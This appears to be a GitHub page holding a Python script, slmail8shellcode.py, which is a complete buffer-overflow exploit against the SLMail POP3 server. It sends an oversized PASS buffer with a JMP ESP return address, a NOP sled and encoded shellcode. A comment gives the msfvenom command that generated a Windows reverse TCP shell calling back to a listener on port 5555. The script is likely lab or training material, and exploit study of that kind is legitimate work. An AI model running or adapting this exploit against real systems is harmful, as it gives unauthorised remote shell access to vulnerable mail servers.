-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathslmail8shellcode.py
More file actions
50 lines (43 loc) · 2.16 KB
/
slmail8shellcode.py
File metadata and controls
50 lines (43 loc) · 2.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode = ("\xd9\xf6\xd9\x74\x24\xf4\xba\x43\xf4\xa7\x7d\x58\x2b\xc9\xb1"
"\x52\x31\x50\x17\x83\xc0\x04\x03\x13\xe7\x45\x88\x6f\xef\x08"
"\x73\x8f\xf0\x6c\xfd\x6a\xc1\xac\x99\xff\x72\x1d\xe9\xad\x7e"
"\xd6\xbf\x45\xf4\x9a\x17\x6a\xbd\x11\x4e\x45\x3e\x09\xb2\xc4"
"\xbc\x50\xe7\x26\xfc\x9a\xfa\x27\x39\xc6\xf7\x75\x92\x8c\xaa"
"\x69\x97\xd9\x76\x02\xeb\xcc\xfe\xf7\xbc\xef\x2f\xa6\xb7\xa9"
"\xef\x49\x1b\xc2\xb9\x51\x78\xef\x70\xea\x4a\x9b\x82\x3a\x83"
"\x64\x28\x03\x2b\x97\x30\x44\x8c\x48\x47\xbc\xee\xf5\x50\x7b"
"\x8c\x21\xd4\x9f\x36\xa1\x4e\x7b\xc6\x66\x08\x08\xc4\xc3\x5e"
"\x56\xc9\xd2\xb3\xed\xf5\x5f\x32\x21\x7c\x1b\x11\xe5\x24\xff"
"\x38\xbc\x80\xae\x45\xde\x6a\x0e\xe0\x95\x87\x5b\x99\xf4\xcf"
"\xa8\x90\x06\x10\xa7\xa3\x75\x22\x68\x18\x11\x0e\xe1\x86\xe6"
"\x71\xd8\x7f\x78\x8c\xe3\x7f\x51\x4b\xb7\x2f\xc9\x7a\xb8\xbb"
"\x09\x82\x6d\x6b\x59\x2c\xde\xcc\x09\x8c\x8e\xa4\x43\x03\xf0"
"\xd5\x6c\xc9\x99\x7c\x97\x9a\xaf\x51\xa7\x22\xd8\x53\xc7\xc7"
"\xab\xdd\x21\x8d\xdb\x8b\xfa\x3a\x45\x96\x70\xda\x8a\x0c\xfd"
"\xdc\x01\xa3\x02\x92\xe1\xce\x10\x43\x02\x85\x4a\xc2\x1d\x33"
"\xe2\x88\x8c\xd8\xf2\xc7\xac\x76\xa5\x80\x03\x8f\x23\x3d\x3d"
"\x39\x51\xbc\xdb\x02\xd1\x1b\x18\x8c\xd8\xee\x24\xaa\xca\x36"
"\xa4\xf6\xbe\xe6\xf3\xa0\x68\x41\xaa\x02\xc2\x1b\x01\xcd\x82"
"\xda\x69\xce\xd4\xe2\xa7\xb8\x38\x52\x1e\xfd\x47\x5b\xf6\x09"
"\x30\x81\x66\xf5\xeb\x01\x96\xbc\xb1\x20\x3f\x19\x20\x71\x22"
"\x9a\x9f\xb6\x5b\x19\x15\x47\x98\x01\x5c\x42\xe4\x85\x8d\x3e"
"\x75\x60\xb1\xed\x76\xa1")
# bad characters \x00 \x0a \0d
# JMP ESP FFE4
# !mona find -s "\xff\xe4 -m slmfc.dll
# 5F4A358F \x8F\x35\x4A\x5F
# msfvenom -p windows/shell_reverse_tcp LHOST=10.209.48.120 LPORT=5555 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C" * (3500 - 2606 - 4 - 351 - 16)
try:
print "\nSending evil buffer..."
s.connect(('10.209.14.46',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"